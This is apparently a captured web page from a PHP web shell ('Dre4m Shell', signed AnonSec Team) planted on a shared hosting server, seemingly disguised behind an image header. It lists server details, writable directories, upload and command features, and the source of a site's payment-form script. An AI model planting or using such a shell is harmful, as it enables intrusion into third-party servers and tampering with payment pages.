ÿØÿàJFIF``ÿþxØ Dre4m Was Here
Dre4m Shell
Server IP : 109.234.164.53  /  Your IP : 216.73.216.110
Web Server : Apache
System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64
User : computer3 ( 1098)
PHP Version : 7.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/computer3/litsolide.com/CE_payment/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/computer3/litsolide.com/CE_payment/form_payment.php
<?php
include ("function.php");


/* --------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------
CREATION DU FORMULAIRE DE PAIEMENT 
Le formulaire de paiement est composé de l'ensemble des champs vads_xxxxx contenu dans le tableau $params 
Celui-ci est envoyé à la plateforme de paiement à l'url suivante :https://paiement.systempay.fr/vads-payment/

---------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------- */

// Selection de la langue
$array_lang = array('en','fr');
$lang=(isset($_REQUEST['lang']))? $_REQUEST['lang']  :'fr';
if (!in_array($lang,$array_lang)) {
	$lang="fr";
	
}
include($lang.'.php');

// CREATION DU FORMULAIRE DE PAIEMENT  encodé en UTF8
$form = get_formHtml_request($_REQUEST, $lang); 

// REDIRECTION AUTOMATIQUE VERS PLATEFORME DE PAIEMENT SI DEBUG DESACTIVE
// AFFICHAGE ET CONFIRMATION DU FORMULAIRE DE PAIEMENT AVANT REDIRECTION SI DEBUG ACTIVE
$conf_txt = parse_ini_file("conf.txt");
if ($conf_txt['debug'] == 0){
echo $form;
}
else{ 
echo (display_form($lang,$form));
}
?>



Anon7 - 2022
AnonSec Team